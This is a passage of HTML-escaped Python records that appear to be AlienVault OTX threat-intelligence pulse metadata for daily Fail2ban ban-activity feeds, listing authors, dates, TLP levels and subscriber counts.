&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-06-20T23:00:05.711000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'304&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-05-21&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'9e9111dd-ddcb-441e-ae99-d5ee334c779d',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;151,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-05-17T23:05:07.746000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ec1c323d4bd488cec284e9b',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-06-16T23:05:47.438000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'308&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-05-17&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cdf0b492-c29e-4389-92ae-4415dbf2c3a2',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;151,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_83487/resized/80/avatar_415dd1922d.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n